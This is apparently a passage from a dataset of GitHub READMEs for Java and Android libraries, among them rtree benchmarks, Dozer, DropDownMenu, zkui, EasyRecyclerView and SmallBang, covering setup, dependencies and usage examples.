### Results These were run on i7-920 @2.67GHz with *rtree* version 0.8-RC7: ``` Benchmark Mode Cnt Score Error Units defaultRTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 262260.993 ± 2767.035 ops/s defaultRTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 296264.913 ± 2836.358 ops/s defaultRTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 135118.271 ± 1722.039 ops/s defaultRTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 315851.452 ± 3097.496 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 278761.674 ± 4182.761 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 315254.478 ± 4104.206 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 214509.476 ± 1555.816 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 118094.486 ± 1118.983 ops/s defaultRTreeSearchOf1000PointsMaxChildren004 thrpt 10 1122140.598 ± 8509.106 ops/s defaultRTreeSearchOf1000PointsMaxChildren010 thrpt 10 569779.807 ± 4206.544 ops/s defaultRTreeSearchOf1000PointsMaxChildren032 thrpt 10 238251.898 ± 3916.281 ops/s defaultRTreeSearchOf1000PointsMaxChildren128 thrpt 10 702437.901 ± 5108.786 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 462243.509 ± 7076.045 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 326395.724 ± 1699.043 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 156978.822 ± 1993.372 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 68267.160 ± 929.236 ops/s rStarTreeDeleteOneEveryOccurrenceFromGreekDataChildren010 thrpt 10 211881.061 ± 3246.693 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 187062.089 ± 3005.413 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 186767.045 ± 2291.196 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 37940.625 ± 743.789 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 151897.089 ± 674.941 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 237708.825 ± 1644.611 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 229577.905 ± 4234.760 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 78290.971 ± 393.030 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 6521.010 ± 50.798 ops/s rStarTreeSearchOf1000PointsMaxChildren004 thrpt 10 1330510.951 ± 18289.410 ops/s rStarTreeSearchOf1000PointsMaxChildren010 thrpt 10 1204347.202 ± 17403.105 ops/s rStarTreeSearchOf1000PointsMaxChildren032 thrpt 10 576765.468 ± 8909.880 ops/s rStarTreeSearchOf1000PointsMaxChildren128 thrpt 10 1028316.856 ± 13747.282 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 904494.751 ± 15640.005 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 649636.969 ± 16383.786 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffers thrpt 10 84230.053 ± 1869.345 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffersBackpressure thrpt 10 36420.500 ± 1572.298 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010WithBackpressure thrpt 10 116970.445 ± 1955.659 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 224874.016 ± 14462.325 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 358636.637 ± 4886.459 ops/s searchNearestGreek thrpt 10 3715.020 ± 46.570 ops/s ``` There is a related project [rtree-benchmark](https://github.com/ambling/rtree-benchmark) that presents a more comprehensive benchmark with results and 
analysis on this rtree implementation.
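The features list above mentions STR bulk loading, but no example appears in this README. Here is a minimal sketch, assuming the builder's `create` overload that accepts a list of entries performs the bulk load (check the javadoc of your version to confirm the overload exists):

```java
import java.util.ArrayList;
import java.util.List;

import com.github.davidmoten.rtree.Entries;
import com.github.davidmoten.rtree.Entry;
import com.github.davidmoten.rtree.RTree;
import com.github.davidmoten.rtree.geometry.Geometries;
import com.github.davidmoten.rtree.geometry.Point;

List<Entry<String, Point>> entries = new ArrayList<>();
entries.add(Entries.entry("DAVE", Geometries.point(10, 20)));
entries.add(Entries.entry("FRED", Geometries.point(12, 25)));
entries.add(Entries.entry("MARY", Geometries.point(97, 125)));

// STR packing builds the tree in one pass instead of inserting entry by entry
RTree<String, Point> tree = RTree.star().maxChildren(6).create(entries);
```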
0
DozerMapper/dozer
Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another.
null
[![Build, Test and Analyze](https://github.com/DozerMapper/dozer/actions/workflows/build.yml/badge.svg)](https://github.com/DozerMapper/dozer/actions/workflows/build.yml) [![Release Version](https://img.shields.io/maven-central/v/com.github.dozermapper/dozer-core.svg?maxAge=2592000)](https://mvnrepository.com/artifact/com.github.dozermapper/dozer-core) [![License](https://img.shields.io/hexpm/l/plug.svg?maxAge=2592000)]() # Dozer ## Project Activity The project is currently not active and will more than likely be deprecated in the future. If you are looking to use Dozer on a greenfield project, we would discourage that. If you have been using Dozer for a while, we would suggest you start to think about migrating to another library, such as: - [mapstruct](https://github.com/mapstruct/mapstruct) - [modelmapper](https://github.com/modelmapper/modelmapper) For those moving to mapstruct, the community has created an [Intellij plugin](https://plugins.jetbrains.com/plugin/20853-dostruct) that can help with the migration. ## Why Map? A mapping framework is useful in a layered architecture where you are creating layers of abstraction by encapsulating changes to particular data objects vs. propagating these objects to other layers (i.e. external service data objects, domain objects, data transfer objects, internal service data objects). Mapping between data objects has traditionally been addressed by hand-coding value object assemblers (or converters) that copy data between the objects. Most programmers will develop some sort of custom mapping framework and spend countless hours and thousands of lines of code mapping to and from their different data objects. This type of code for such conversions is rather boring to write, so why not do it automatically? ## What is Dozer? Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another. It is an open source mapping framework that is robust, generic, flexible, reusable, and configurable. Dozer supports simple property mapping, complex type mapping, bi-directional mapping, implicit-explicit mapping, as well as recursive mapping. This includes mapping collection attributes that also need mapping at the element level. Dozer not only supports mapping between attribute names, but also automatically converting between types. Most conversion scenarios are supported out of the box, but Dozer also allows you to specify custom conversions via XML or code-based configuration (a code-based sketch follows the simple example below). ## Getting Started Check out the [Getting Started Guide](https://dozermapper.github.io/gitbook/documentation/gettingstarted.html), [Full User Guide](https://dozermapper.github.io/user-guide.pdf) or [GitBook](https://dozermapper.github.io/gitbook/) for advanced information. ## Getting the Distribution If you are using Maven, simply copy-paste this dependency to your project.
```XML <dependency> <groupId>com.github.dozermapper</groupId> <artifactId>dozer-core</artifactId> <version>7.0.0</version> </dependency> ``` ## Simple Example ```XML <mapping> <class-a>yourpackage.SourceClassName</class-a> <class-b>yourpackage.DestinationClassName</class-b> <field> <a>yourSourceFieldName</a> <b>yourDestinationFieldName</b> </field> </mapping> ``` ```Java SourceClassName sourceObject = new SourceClassName(); sourceObject.setYourSourceFieldName("Dozer"); Mapper mapper = DozerBeanMapperBuilder.buildDefault(); DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class); assertTrue(destObject.getYourDestinationFieldName().equals(sourceObject.getYourSourceFieldName())); ```
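For completeness, the same mapping can also be expressed through code-based configuration rather than XML. This is a hedged sketch assuming the `com.github.dozermapper.core` API of dozer-core 6+/7 (verify the class names against your version); it reuses `sourceObject` from the example above:

```Java
import com.github.dozermapper.core.DozerBeanMapperBuilder;
import com.github.dozermapper.core.Mapper;
import com.github.dozermapper.core.loader.api.BeanMappingBuilder;

Mapper mapper = DozerBeanMapperBuilder.create()
        .withMappingBuilder(new BeanMappingBuilder() {
            @Override
            protected void configure() {
                // same field pairing as the XML example above
                mapping(SourceClassName.class, DestinationClassName.class)
                        .fields("yourSourceFieldName", "yourDestinationFieldName");
            }
        })
        .build();

DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class);
```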
0
dongjunkun/DropDownMenu
A practical multi-condition filter menu
dongjunkun dropdown-menus
[![](https://jitpack.io/v/dongjunkun/DropDownMenu.svg)](https://jitpack.io/#dongjunkun/DropDownMenu) ## Introduction A practical multi-condition filter menu; you can see this effect in many apps, such as Meituan and the iQIYI movie ticket app. My blog post: [Building your own wheel -- implementation ideas for a common Android multi-condition filter menu (similar to the Meituan and iQIYI movie ticket drop-down menus)](http://www.jianshu.com/p/d9407f799d2d) ## Features - Supports multi-level menus - You can fully customize your menu style; this library only encapsulates some practical methods, such as the tab switching effect and the menu show/hide effects - Not implemented with PopupWindow, so there is no lag ## ScreenShot <img src="https://raw.githubusercontent.com/dongjunkun/DropDownMenu/master/art/simple.gif"/> <a href="https://raw.githubusercontent.com/dongjunkun/DropDownMenu/master/app/build/outputs/apk/app-debug.apk">Download APK</a> or scan the QR code <img src="https://raw.githubusercontent.com/dongjunkun/DropDownMenu/master/art/download.png"/> ## Gradle Dependency ``` allprojects { repositories { ... maven { url "https://jitpack.io" } } } dependencies { compile 'com.github.dongjunkun:DropDownMenu:1.0.4' } ``` ## Usage Add DropDownMenu to your layout file, as follows: ``` <com.yyydjk.library.DropDownMenu android:id="@+id/dropDownMenu" android:layout_width="match_parent" android:layout_height="match_parent" app:ddmenuTextSize="13sp" // tab text size app:ddtextUnselectedColor="@color/drop_down_unselected" // tab unselected color app:ddtextSelectedColor="@color/drop_down_selected" // tab selected color app:dddividerColor="@color/gray" // divider color app:ddunderlineColor="@color/gray" // underline color app:ddmenuSelectedIcon="@mipmap/drop_down_selected_icon" // tab selected icon app:ddmenuUnselectedIcon="@mipmap/drop_down_unselected_icon" // tab unselected icon app:ddmaskColor="@color/mask_color" // mask color, usually translucent app:ddmenuBackgroundColor="@color/white" // tab background color app:ddmenuMenuHeightPercent="0.5" // maximum menu height, as a percentage of screen height ... /> ``` Then we only need to call the following code in Java (a fuller sketch appears at the end of this README): ``` // tabs: all tab titles; popupViews: all menu views; contentView: the content view mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView); ``` To learn more, look at the source directly: <a href="https://github.com/dongjunkun/DropDownMenu/blob/master/app/src/main/java/com/yyy/djk/dropdownmenu/MainActivity.java">Example</a> > It is recommended to copy the code into your project: just copy DropDownMenu.java and all the files under res. ## About Me Jianshu: [dongjunkun](http://www.jianshu.com/users/f07458c1a8f3/latest_articles)
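A fuller sketch of the `setDropDownMenu` call above (the tab titles and menu views are hypothetical placeholders; view construction is simplified):

```
String[] headers = {"City", "Age", "Sort"};
List<String> tabs = Arrays.asList(headers);

// one popup view per tab; plain ListViews stand in for real menu views
List<View> popupViews = new ArrayList<>();
popupViews.add(new ListView(context));
popupViews.add(new ListView(context));
popupViews.add(new ListView(context));

// the content shown below the tabs
TextView contentView = new TextView(context);
contentView.setText("content");

mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView);
```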
0
in28minutes/spring-master-class
An updated introduction to the Spring Framework 5. Become an Expert understanding the core features of Spring In Depth. You would write Unit Tests, AOP, JDBC and JPA code during the course. Includes introductions to Spring Boot, JPA, Eclipse, Maven, JUnit and Mockito.
null
# Spring Master Class - Journey from Beginner to Expert [![Image](https://www.springboottutorial.com/images/Course-Spring-Framework-Master-Class---Beginner-to-Expert.png "Spring Master Class - Beginner to Expert")](https://www.udemy.com/course/spring-tutorial-for-beginners/) Learn the magic of the Spring Framework. From IOC (Inversion of Control), DI (Dependency Injection), and Application Context to the world of Spring Boot, AOP, JDBC and JPA. Get set for an incredible journey. ### Introduction The Spring Framework remains as popular today as it was when I first used it 12 years back. How is this possible in an incredibly dynamic world where architectures have completely changed? ### What You will learn - You will learn the basics of the Spring Framework - Dependency Injection, IOC Container, Application Context and Bean Factory. - You will understand how to use Spring Annotations - @Autowired, @Component, @Service, @Repository, @Configuration, @Primary.... - You will understand Spring MVC in depth - DispatcherServlet, Model, Controllers and ViewResolver - You will use a variety of Spring Boot Starters - Spring Boot Starter Web, Starter Data Jpa, Starter Test - You will learn the basics of Spring Boot, Spring AOP, Spring JDBC and JPA - You will learn the basics of Eclipse, Maven, JUnit and Mockito - You will develop a basic Web application step by step using JSP Servlets and Spring MVC - You will learn to write unit tests with XML, Java Application Contexts and Mockito ### Requirements - You should have working knowledge of Java and Annotations. - We will help you install Eclipse and get up and running with Maven and Tomcat. ### Step Wise Details Refer to each section. ## Installing Tools - Installation Video: https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 - GIT Repository For Installation: https://github.com/in28minutes/getting-started-in-5-steps - PDF: https://github.com/in28minutes/SpringIn28Minutes/blob/master/InstallationGuide-JavaEclipseAndMaven_v2.pdf ## Running Examples - Download the zip or clone the Git repository. - Unzip the zip file (if you downloaded one) - Open Command Prompt and change directory (cd) to the folder containing pom.xml - Open Eclipse - File -> Import -> Existing Maven Project -> Navigate to the folder where you unzipped the zip - Select the right project - Choose the Spring Boot Application file (search for @SpringBootApplication) - Right-click on the file and Run as Java Application - You are all set - For help: use our installation guide - https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 ### Troubleshooting - Refer to our Troubleshooting Guide - https://github.com/in28minutes/in28minutes-initiatives/tree/master/The-in28Minutes-TroubleshootingGuide-And-FAQ ## Youtube Playlists - 500+ Videos [Click here - 30+ Playlists with 500+ Videos on Spring, Spring Boot, REST, Microservices and the Cloud](https://www.youtube.com/user/rithustutorials/playlists?view=1&sort=lad&flow=list) ## Keep Learning in28Minutes in28Minutes is creating amazing solutions for you to learn Spring Boot, Full Stack and the Cloud - Docker, Kubernetes, AWS, React, Angular etc. - [Check out all our courses here](https://github.com/in28minutes/learn) ![in28MinutesLearningRoadmap-July2019.png](https://github.com/in28minutes/in28Minutes-Course-Roadmap/raw/master/in28MinutesLearningRoadmap-July2019.png)
0
DeemOpen/zkui
A UI dashboard that allows CRUD operations on Zookeeper.
null
zkui - Zookeeper UI Dashboard ==================== A UI dashboard that allows CRUD operations on Zookeeper. Requirements ==================== Requires Java 7 to run. Setup ==================== 1. mvn clean install 2. Copy the config.cfg to the folder with the jar file. Modify it to point to the zookeeper instance. Multiple zk instances are comma separated. eg: server1:2181,server2:2181. The first server should always be the leader. 3. Run the jar. ( nohup java -jar zkui-2.0-SNAPSHOT-jar-with-dependencies.jar & ) 4. <a href="http://localhost:9090">http://localhost:9090</a> Login Info ==================== username: admin, pwd: manager (Admin privileges, CRUD operations supported) username: appconfig, pwd: appconfig (Readonly privileges, Read operations supported) You can change this in the config.cfg Technology Stack ==================== 1. Embedded Jetty Server. 2. Freemarker template. 3. H2 DB. 4. Active JDBC. 5. JSON. 6. SLF4J. 7. Zookeeper. 8. Apache Commons File upload. 9. Bootstrap. 10. Jquery. 11. Flyway DB migration. Features ==================== 1. CRUD operations on zookeeper properties. 2. Export properties. 3. Import properties via callback url. 4. Import properties via file upload. 5. History of changes + path-specific history of changes. 6. Search feature. 7. Rest API for accessing Zookeeper properties. 8. Basic role-based authentication. 9. LDAP authentication supported. 10. Root node /zookeeper hidden for safety. 11. ACLs supported at a global level. Import File Format ==================== # add property /appconfig/path=property=value # remove a property -/path/property You can either upload a file or specify an http url of the version control system; that way all your zookeeper changes will be in version control. Export File Format ==================== /appconfig/path=property=value You can export a file and then use the same format to import. SOPA/PIPA BLACKLISTED VALUE ==================== All passwords will be displayed as SOPA/PIPA BLACKLISTED VALUE for a normal user. Admins will be able to view and edit the actual value upon login. Passwords will not be shown in search / export / view for normal users. For a property to be eligible for blacklisting it should have (PWD / pwd / PASSWORD / password) in the property name. LDAP ==================== If you want to use LDAP authentication, provide the ldap url. This will take precedence over roleSet property file authentication. ldapUrl=ldap://<ldap_host>:<ldap_port>/dc=mycom,dc=com If you don't provide this then the default roleSet file authentication will be used. REST call ==================== A lot of times you require your shell scripts to be able to read properties from zookeeper. This can now be achieved with an http call. Passwords are not exposed via the rest api for security reasons. The rest call is a read-only operation requiring no authentication. Eg: http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com This will first look up the host name under /appconfig/hosts and then find out which path the host points to. Then it will look for the property under that path. There are 2 additional properties that can be added to give better control. cluster=cluster1 http://localhost:9090/acd/appconfig?propNames=foo&cluster=cluster1&host=myhost.com In this case the lookup will happen on lookup path + cluster1. app=myapp http://localhost:9090/acd/appconfig?propNames=foo&app=myapp&host=myhost.com In this case the lookup will happen on lookup path + myapp.
A shell script can call this via

MY_PROPERTY="$(curl -f -s -S -k "http://localhost:9090/acd/appconfig?propNames=foo&host=`hostname -f`" | cut -d '=' -f 2)"
echo $MY_PROPERTY

Standardization
====================
Zookeeper doesn't enforce any order in which properties are stored and retrieved. ZKUI however organizes properties in the following manner for easy lookup. Each server/box has its hostname listed under /appconfig/hosts, and that entry points to the path where the properties for that host reside. So when the lookup for a property occurs over a REST call, it first finds the hostname entry under /appconfig/hosts and then looks for that property in the location mentioned.

eg: /appconfig/hosts/myserver.com=/appconfig/dev/app1

This means that when myserver.com tries to look up the property, it looks under /appconfig/dev/app1

You can also append an app name to make lookup easy.
eg: /appconfig/hosts/myserver.com:testapp=/appconfig/dev/test/app1
eg: /appconfig/hosts/myserver.com:prodapp=/appconfig/dev/prod/app1

Lookup can be done by grouping of app and cluster. A cluster can have many apps under it. When the bootloader entry looks like this /appconfig/hosts/myserver.com=/appconfig/dev the REST lookup happens on the following paths.
/appconfig/dev/..
/appconfig/dev/hostname..
/appconfig/dev/app..
/appconfig/dev/cluster..
/appconfig/dev/cluster/app..

This standardization is only needed if you choose to use the REST lookup. You can use zkui to update properties in general without worrying about this organizing structure.

HTTPS
====================
You can enable HTTPS if needed.

keytool -keystore keystore -alias jetty -genkey -keyalg RSA

Limitations
====================
1. ACLs are fully supported, but only at a global level.

Screenshots
====================
Basic Role Based Authentication
<br/>
<img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-0.png"/>
<br/>
Dashboard Console
<br/>
<img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-1.png"/>
<br/>
CRUD Operations
<br/>
<img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-2.png"/>
<br/>
Import Feature
<br/>
<img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-3.png"/>
<br/>
Track History of changes
<br/>
<img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-4.png"/>
<br/>
Status of Zookeeper Servers
<br/>
<img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-5.png"/>
<br/>

License & Contribution
====================
ZKUI is released under the Apache 2.0 license. Comments, bugs, pull requests, and other contributions are all welcome!

Thanks to Jozef Krajčovič for creating the logo which has been used in the project.
https://www.iconfinder.com/iconsets/origami-birds
0
Jude95/EasyRecyclerView
ArrayAdapter,pull to refresh,auto load more,Header/Footer,EmptyView,ProgressView,ErrorView
null
# EasyRecyclerView

[中文](https://github.com/Jude95/EasyRecyclerView/blob/master/README_ch.md) | [English](https://github.com/Jude95/EasyRecyclerView/blob/master/README.md)

Encapsulates many RecyclerView APIs in one library, such as an ArrayAdapter, pull to refresh, auto load more, "no more" and error views at the end, and header & footer support.

The library uses a new approach to ViewHolders that decouples the ViewHolder from the Adapter. The Adapter does less work: it only directs the ViewHolders, so if you use MVP you can put the adapter into the presenter. The ViewHolder only shows the item, so you can use one ViewHolder with many Adapters.

Part of the code is modified from [Malinskiy/SuperRecyclerView](https://github.com/Malinskiy/SuperRecyclerView), with more functions handled by the Adapter.

# Dependency
```groovy
compile 'com.jude:easyrecyclerview:4.4.2'
```

# ScreenShot
![recycler.gif](recycler3.gif)

# Usage
## EasyRecyclerView
```xml
<com.jude.easyrecyclerview.EasyRecyclerView
    android:id="@+id/recyclerView"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    app:layout_empty="@layout/view_empty"
    app:layout_progress="@layout/view_progress"
    app:layout_error="@layout/view_error"
    app:recyclerClipToPadding="true"
    app:recyclerPadding="8dp"
    app:recyclerPaddingTop="8dp"
    app:recyclerPaddingBottom="8dp"
    app:recyclerPaddingLeft="8dp"
    app:recyclerPaddingRight="8dp"
    app:scrollbarStyle="insideOverlay"
    app:scrollbars="none"
    />
```
(`scrollbarStyle` accepts insideOverlay, insideInset, outsideOverlay or outsideInset; `scrollbars` accepts none, vertical or horizontal.)

**Attention** EasyRecyclerView is not a RecyclerView, it just contains a RecyclerView. Use `getRecyclerView()` to get the RecyclerView.

**EmptyView&LoadingView&ErrorView**
xml:
```xml
app:layout_empty="@layout/view_empty"
app:layout_progress="@layout/view_progress"
app:layout_error="@layout/view_error"
```
code:
```java
void setEmptyView(View emptyView)
void setProgressView(View progressView)
void setErrorView(View errorView)
```
then you can show any of them whenever you like:
```java
void showEmpty()
void showProgress()
void showError()
void showRecycler()
```

**scrollToPosition**
```java
void scrollToPosition(int position); // such as scroll to top
```

**control the pullToRefresh**
```java
void setRefreshing(boolean isRefreshing);
void setRefreshing(final boolean isRefreshing, final boolean isCallback); // second param decides whether the refresh listener is called back immediately
```

## RecyclerArrayAdapter<T>
There is no relation between RecyclerArrayAdapter and EasyRecyclerView. You can use any Adapter with the EasyRecyclerView, and the RecyclerArrayAdapter with any RecyclerView.

**Data Manage**
```java
void add(T object);
void addAll(Collection<? extends T> collection);
void addAll(T ... items);
void insert(T object, int index);
void update(T object, int index);
void remove(T object);
void clear();
void sort(Comparator<? super T> comparator);
```

**Header&Footer**
```java
void addHeader(ItemView view)
void addFooter(ItemView view)
```
ItemView is not a view but a view creator:
```java
public interface ItemView {
     View onCreateView(ViewGroup parent);
     void onBindView(View itemView);
}
```
onCreateView and onBindView correspond to the callbacks in RecyclerView's Adapter, so the adapter will call `onCreateView` once and `onBindView` more than once. It is recommended to add the ItemView to the Adapter after the data is loaded, to initialize the View in onCreateView, and to do nothing in onBindView (a minimal footer sketch follows below).

Header and Footer support `LinearLayoutManager`, `GridLayoutManager` and `StaggeredGridLayoutManager`.
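For illustration, here is the footer sketch referred to above, written as a fragment in the style of the snippets in this README (hedged: `R.layout.view_footer` is an assumed layout resource):

```java
// Sketch of a simple footer: inflate once in onCreateView, do nothing in onBindView.
adapter.addFooter(new ItemView() {
    @Override
    public View onCreateView(ViewGroup parent) {
        // called once by the adapter: inflate and initialize the footer view here
        return LayoutInflater.from(parent.getContext())
                .inflate(R.layout.view_footer, parent, false); // assumed layout
    }

    @Override
    public void onBindView(View itemView) {
        // called on every bind: intentionally left empty, as recommended above
    }
});
```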
In `GridLayoutManager` you must add this:
```java
// make the adapter provide a span-size lookup for the LayoutManager; the param is maxSpan
gridLayoutManager.setSpanSizeLookup(adapter.obtainGridSpanSizeLookUp(2));
```

**OnItemClickListener&OnItemLongClickListener**
```java
adapter.setOnItemClickListener(new RecyclerArrayAdapter.OnItemClickListener() {
    @Override
    public void onItemClick(int position) {
        // position does not include the Header
    }
});

adapter.setOnItemLongClickListener(new RecyclerArrayAdapter.OnItemLongClickListener() {
    @Override
    public boolean onItemLongClick(int position) {
        return true;
    }
});
```
This is equivalent to 'itemView.setOnClickListener()' in the ViewHolder. If you set the listener after the RecyclerView has been laid out, you should call 'notifyDataSetChanged()'.

### The APIs below are realized by adding a Footer.

**LoadMore**
```java
void setMore(final int res,OnMoreListener listener);
void setMore(final View view,OnMoreListener listener);
```
Attention: when you add null, or the data you add has length 0, LoadMore finishes and NoMore is shown. You can also show NoMore manually: `adapter.stopMore();`

**LoadError**
```java
void setError(final int res,OnErrorListener listener)
void setError(final View view,OnErrorListener listener)
```
Use `adapter.pauseMore()` to show the Error view when your loading throws an error. If you add data while the Error view is showing, loading more will resume. When the ErrorView is displayed on screen again, loading more will also resume, and the OnLoadMoreListener will be called back (retry).

With `adapter.resumeMore()` you can resume loading more manually; it will call back the OnLoadMoreListener immediately. You can put resumeMore() into the OnClickListener of the ErrorView to realize click-to-retry.

**NoMore**
```java
void setNoMore(final int res,OnNoMoreListener listener)
void setNoMore(final View view,OnNoMoreListener listener)
```
When loading is finished (null or empty data was added, or loading was stopped manually), it will be shown at the end.

## BaseViewHolder\<M\>
Decouples the ViewHolder from the Adapter: create the ViewHolder in the Adapter and inflate the view in the ViewHolder.
Example:
```java
public class PersonViewHolder extends BaseViewHolder<Person> {
    private TextView mTv_name;
    private SimpleDraweeView mImg_face;
    private TextView mTv_sign;

    public PersonViewHolder(ViewGroup parent) {
        super(parent,R.layout.item_person);
        mTv_name = $(R.id.person_name);
        mTv_sign = $(R.id.person_sign);
        mImg_face = $(R.id.person_face);
    }

    @Override
    public void setData(final Person person){
        mTv_name.setText(person.getName());
        mTv_sign.setText(person.getSign());
        mImg_face.setImageURI(Uri.parse(person.getFace()));
    }
}
-----------------------------------------------------------------------
public class PersonAdapter extends RecyclerArrayAdapter<Person> {
    public PersonAdapter(Context context) {
        super(context);
    }

    @Override
    public BaseViewHolder OnCreateViewHolder(ViewGroup parent, int viewType) {
        return new PersonViewHolder(parent);
    }
}
```

## Decoration
Three commonly used decorations are provided.

**DividerDecoration**
Usually used with a LinearLayoutManager; adds a divider between items.
```java
DividerDecoration itemDecoration = new DividerDecoration(Color.GRAY, Util.dip2px(this,0.5f), Util.dip2px(this,72),0); // color & height & paddingLeft & paddingRight
itemDecoration.setDrawLastItem(true);     // sometimes you don't want to draw the divider for the last item; default is true
itemDecoration.setDrawHeaderFooter(false); // whether to draw the divider for header and footer; default is false
recyclerView.addItemDecoration(itemDecoration);
```
this is the demo:
<image src="http://o84n5syhk.bkt.clouddn.com/divider.jpg?imageView2/2/w/300" width=300/>

**SpaceDecoration**
Usually used with GridLayoutManager and StaggeredGridLayoutManager; adds space between items.
```java
SpaceDecoration itemDecoration = new SpaceDecoration((int) Utils.convertDpToPixel(8,this)); // param is the space size
itemDecoration.setPaddingEdgeSide(true);     // whether to add space to the left and right edges; default is true
itemDecoration.setPaddingStart(true);        // whether to add top space for the first line of items (excluding the header); default is true
itemDecoration.setPaddingHeaderFooter(false); // whether to add space for header and footer; default is false
recyclerView.addItemDecoration(itemDecoration);
```
this is the demo:
<image src="http://o84n5syhk.bkt.clouddn.com/space.jpg?imageView2/2/w/300" width=300/>

**StickHeaderDecoration**
Groups the items and adds a GroupHeaderView for each group. The usage of StickyHeaderAdapter is the same as RecyclerView.Adapter. This part is modified from [edubarr/header-decor](https://github.com/edubarr/header-decor)
```java
StickyHeaderDecoration decoration = new StickyHeaderDecoration(new StickyHeaderAdapter(this));
decoration.setIncludeHeader(false);
recyclerView.addItemDecoration(decoration);
```
for example:
<image src="http://7xkr5d.com1.z0.glb.clouddn.com/recyclerview_sticky.png?imageView2/2/w/300" width=300/>

**For details, see the demo.**

License
-------

    Copyright 2015 Jude

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.
0
hanks-zyh/SmallBang
twitter like animation for any view :heartbeat:
animation heartbeat like-button twitter
# SmallBang
twitter like animation for any view :heartbeat:

<img src="https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo2.gif" width="35%" />

[Demo APK](https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo.apk?raw=true)

## Usage

```groovy
dependencies {
   implementation 'pub.hanks:smallbang:1.2.2'
}
```

```xml
<xyz.hanks.library.bang.SmallBangView
    android:id="@+id/like_heart"
    android:layout_width="56dp"
    android:layout_height="56dp">

    <ImageView
        android:id="@+id/image"
        android:layout_width="20dp"
        android:layout_height="20dp"
        android:layout_gravity="center"
        android:src="@drawable/heart_selector"/>
</xyz.hanks.library.bang.SmallBangView>
```
or
```xml
<xyz.hanks.library.bang.SmallBangView
    android:id="@+id/like_text"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    app:circle_end_color="#ffbc00"
    app:circle_start_color="#fa9651"
    app:dots_primary_color="#fa9651"
    app:dots_secondary_color="#ffbc00">

    <TextView
        android:id="@+id/text"
        android:layout_width="50dp"
        android:layout_height="20dp"
        android:layout_gravity="center"
        android:gravity="center"
        android:text="hanks"
        android:textColor="@color/text_selector"
        android:textSize="14sp"/>
</xyz.hanks.library.bang.SmallBangView>
```

## Donate

If this project helps you reduce development time, you can buy me a cup of coffee :)

[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UGENU2RU26RUG)

<img src="https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/donate.png" width="50%" />

## Contact & Help

Please feel free to contact me if there is any problem when using the library.

- **email**: zhangyuhan2014@gmail.com
- **twitter**: https://twitter.com/zhangyuhan3030
- **weibo**: http://weibo.com/hanksZyh
- **blog**: http://hanks.pub

You are welcome to open an [issue](https://github.com/hanks-zyh/SmallBang/issues) or submit a [pr](https://github.com/hanks-zyh/SmallBang/pulls)

---

## License

This library is licensed under the [Apache Software License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0). See [`LICENSE`](LICENSE) for the full license text.

    Copyright (C) 2015 [Hanks](https://github.com/hanks-zyh)

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
